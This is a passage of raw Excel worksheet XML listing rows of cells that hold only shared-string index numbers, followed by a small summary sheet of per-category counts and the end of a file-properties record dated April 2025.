      </c>
      <c r="B161" s="1"/>
      <c r="C161" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D161" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E161" s="1"/>
      <c r="F161" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="162" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A162" s="1" t="s">
        <v>338</v>
      </c>
      <c r="B162" s="1"/>
      <c r="C162" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D162" s="1" t="s">
        <v>339</v>
      </c>
      <c r="E162" s="1"/>
      <c r="F162" s="1" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="163" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A163" s="1" t="s">
        <v>340</v>
      </c>
      <c r="B163" s="1"/>
      <c r="C163" s="1" t="s">
        <v>74</v>
      </c>
      <c r="D163" s="1" t="s">
        <v>341</v>
      </c>
      <c r="E163" s="1"/>
      <c r="F163" s="1" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="164" spans="1:6" ht="119" x14ac:dyDescent="0.2">
      <c r="A164" s="1" t="s">
        <v>342</v>
      </c>
      <c r="B164" s="1"/>
      <c r="C164" s="1" t="s">
        <v>361</v>
      </c>
      <c r="D164" s="1" t="s">
        <v>343</v>
      </c>
      <c r="E164" s="1"/>
      <c r="F164" s="1" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="165" spans="1:6" ht="102" x14ac:dyDescent="0.2">
      <c r="A165" s="1" t="s">
        <v>344</v>
      </c>
      <c r="B165" s="1"/>
      <c r="C165" s="1" t="s">
        <v>361</v>
      </c>
      <c r="D165" s="1" t="s">
        <v>345</v>
      </c>
      <c r="E165" s="1"/>
      <c r="F165" s="1" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="166" spans="1:6" ht="204" x14ac:dyDescent="0.2">
      <c r="A166" s="1" t="s">
        <v>346</v>
      </c>
      <c r="B166" s="1"/>
      <c r="C166" s="1" t="s">
        <v>362</v>
      </c>
      <c r="D166" s="1" t="s">
        <v>347</v>
      </c>
      <c r="E166" s="1"/>
      <c r="F166" s="1" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="167" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A167" s="1" t="s">
        <v>348</v>
      </c>
      <c r="B167" s="1"/>
      <c r="C167" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D167" s="1" t="s">
        <v>349</v>
      </c>
      <c r="E167" s="1"/>
      <c r="F167" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="168" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A168" s="1" t="s">
        <v>350</v>
      </c>
      <c r="B168" s="1"/>
      <c r="C168" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D168" s="1" t="s">
        <v>351</v>
      </c>
      <c r="E168" s="1"/>
      <c r="F168" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="169" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A169" s="1" t="s">
        <v>352</v>
      </c>
      <c r="B169" s="1"/>
      <c r="C169" s="1" t="s">
        <v>35</v>
      </c>
      <c r="D169" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E169" s="1"/>
      <c r="F169" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="170" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A170" s="1" t="s">
        <v>353</v>
      </c>
      <c r="B170" s="1" t="s">
        <v>411</v>
      </c>
      <c r="C170" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D170" s="1" t="s">
        <v>354</v>
      </c>
      <c r="E170" s="1"/>
      <c r="F170" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="171" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A171" s="1" t="s">
        <v>355</v>
      </c>
      <c r="B171" s="1" t="s">
        <v>408</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D171" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E171" s="1"/>
      <c r="F171" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="172" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A172" s="1" t="s">
        <v>356</v>
      </c>
      <c r="B172" s="1"/>
      <c r="C172" s="1" t="s">
        <v>74</v>
      </c>
      <c r="D172" s="1" t="s">
        <v>357</v>
      </c>
      <c r="E172" s="1"/>
      <c r="F172" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="173" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A173" s="1" t="s">
        <v>358</v>
      </c>
      <c r="B173" s="1" t="s">
        <v>412</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D173" s="1" t="s">
        <v>359</v>
      </c>
      <c r="E173" s="1"/>
      <c r="F173" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="174" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A174" s="1" t="s">
        <v>360</v>
      </c>
      <c r="B174" s="1" t="s">
        <v>417</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D174" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E174" s="1"/>
      <c r="F174" s="1" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="175" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A175" s="1" t="s">
        <v>365</v>
      </c>
      <c r="B175" s="1" t="s">
        <v>409</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D175" s="1" t="s">
        <v>366</v>
      </c>
      <c r="E175" s="1" t="s">
        <v>367</v>
      </c>
      <c r="F175" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="176" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A176" s="1" t="s">
        <v>369</v>
      </c>
      <c r="B176" s="1" t="s">
        <v>410</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D176" s="1" t="s">
        <v>370</v>
      </c>
      <c r="E176" s="1"/>
      <c r="F176" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="177" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A177" s="1" t="s">
        <v>371</v>
      </c>
      <c r="B177" s="1"/>
      <c r="C177" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D177" s="1" t="s">
        <v>372</v>
      </c>
      <c r="E177" s="1"/>
      <c r="F177" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="178" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A178" s="1" t="s">
        <v>373</v>
      </c>
      <c r="B178" s="1"/>
      <c r="C178" s="1" t="s">
        <v>35</v>
      </c>
      <c r="D178" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E178" s="1"/>
      <c r="F178" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="179" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A179" s="1" t="s">
        <v>374</v>
      </c>
      <c r="B179" s="1"/>
      <c r="C179" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D179" s="1" t="s">
        <v>375</v>
      </c>
      <c r="E179" s="1"/>
      <c r="F179" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="180" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A180" s="1" t="s">
        <v>376</v>
      </c>
      <c r="B180" s="1" t="s">
        <v>408</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D180" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E180" s="1" t="s">
        <v>377</v>
      </c>
      <c r="F180" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="181" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A181" s="1" t="s">
        <v>378</v>
      </c>
      <c r="B181" s="1"/>
      <c r="C181" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D181" s="1" t="s">
        <v>379</v>
      </c>
      <c r="E181" s="1"/>
      <c r="F181" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="182" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A182" s="1" t="s">
        <v>380</v>
      </c>
      <c r="B182" s="1"/>
      <c r="C182" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D182" s="1" t="s">
        <v>242</v>
      </c>
      <c r="E182" s="1"/>
      <c r="F182" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="183" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A183" s="1" t="s">
        <v>381</v>
      </c>
      <c r="B183" s="1"/>
      <c r="C183" s="1" t="s">
        <v>35</v>
      </c>
      <c r="D183" s="1" t="s">
        <v>382</v>
      </c>
      <c r="E183" s="1" t="s">
        <v>383</v>
      </c>
      <c r="F183" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="184" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A184" s="1" t="s">
        <v>384</v>
      </c>
      <c r="B184" s="1"/>
      <c r="C184" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D184" s="1" t="s">
        <v>385</v>
      </c>
      <c r="E184" s="1"/>
      <c r="F184" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="185" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A185" s="1" t="s">
        <v>386</v>
      </c>
      <c r="B185" s="1"/>
      <c r="C185" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D185" s="1" t="s">
        <v>387</v>
      </c>
      <c r="E185" s="1" t="s">
        <v>388</v>
      </c>
      <c r="F185" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="186" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A186" s="1" t="s">
        <v>389</v>
      </c>
      <c r="B186" s="1"/>
      <c r="C186" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D186" s="1" t="s">
        <v>390</v>
      </c>
      <c r="E186" s="1"/>
      <c r="F186" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="187" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A187" s="1" t="s">
        <v>391</v>
      </c>
      <c r="B187" s="1"/>
      <c r="C187" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D187" s="1" t="s">
        <v>392</v>
      </c>
      <c r="E187" s="1"/>
      <c r="F187" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="188" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A188" s="1" t="s">
        <v>393</v>
      </c>
      <c r="B188" s="1"/>
      <c r="C188" s="1" t="s">
        <v>306</v>
      </c>
      <c r="D188" s="1" t="s">
        <v>394</v>
      </c>
      <c r="E188" s="1"/>
      <c r="F188" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="189" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A189" s="1" t="s">
        <v>395</v>
      </c>
      <c r="B189" s="1"/>
      <c r="C189" s="1" t="s">
        <v>306</v>
      </c>
      <c r="D189" s="1" t="s">
        <v>396</v>
      </c>
      <c r="E189" s="1"/>
      <c r="F189" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="190" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A190" s="1" t="s">
        <v>397</v>
      </c>
      <c r="B190" s="1"/>
      <c r="C190" s="1" t="s">
        <v>306</v>
      </c>
      <c r="D190" s="1" t="s">
        <v>398</v>
      </c>
      <c r="E190" s="1"/>
      <c r="F190" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="191" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A191" s="1" t="s">
        <v>399</v>
      </c>
      <c r="B191" s="1"/>
      <c r="C191" s="1" t="s">
        <v>306</v>
      </c>
      <c r="D191" s="1" t="s">
        <v>400</v>
      </c>
      <c r="E191" s="1"/>
      <c r="F191" s="1" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="192" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A192" s="1" t="s">
        <v>401</v>
      </c>
      <c r="B192" s="1"/>
      <c r="C192" s="1" t="s">
        <v>306</v>
      </c>
      <c r="D192" s="1" t="s">
        <v>402</v>
      </c>
      <c r="E192" s="1"/>
      <c r="F192" s="1" t="s">
        <v>368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2316A-A7B3-0B48-9538-3C23C55E64AE}">
  <dimension ref="A3:C15"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A4" sqref="A4:A14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="159" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="15.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>421</v>
      </c>
      <c r="B3" t="s">
        <v>423</v>
      </c>
      <c r="C3" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>364</v>
      </c>
      <c r="B4" s="4">
        <v>4</v>
      </c>
      <c r="C4" s="4">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>283</v>
      </c>
      <c r="B5" s="4">
        <v>3</v>
      </c>
      <c r="C5" s="4">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>404</v>
      </c>
      <c r="B6" s="4">
        <v>2</v>
      </c>
      <c r="C6" s="4">
        <v>8</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>363</v>
      </c>
      <c r="B7" s="4"/>
      <c r="C7" s="4">
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B8" s="4">
        <v>5</v>
      </c>
      <c r="C8" s="4">
        <v>19</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B9" s="4">
        <v>9</v>
      </c>
      <c r="C9" s="4">
        <v>18</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>368</v>
      </c>
      <c r="B10" s="4">
        <v>3</v>
      </c>
      <c r="C10" s="4">
        <v>18</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>118</v>
      </c>
      <c r="B11" s="4">
        <v>9</v>
      </c>
      <c r="C11" s="4">
        <v>21</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>201</v>
      </c>
      <c r="B12" s="4">
        <v>12</v>
      </c>
      <c r="C12" s="4">
        <v>42</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>403</v>
      </c>
      <c r="B13" s="4">
        <v>8</v>
      </c>
      <c r="C13" s="4">
        <v>20</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>76</v>
      </c>
      <c r="B14" s="4">
        <v>2</v>
      </c>
      <c r="C14" s="4">
        <v>13</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="3" t="s">
        <v>422</v>
      </c>
      <c r="B15" s="4">
        <v>57</v>
      </c>
      <c r="C15" s="4">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2025-04-23T13:57:12Z</dcterms:modified>
</cp:coreProperties>
</file>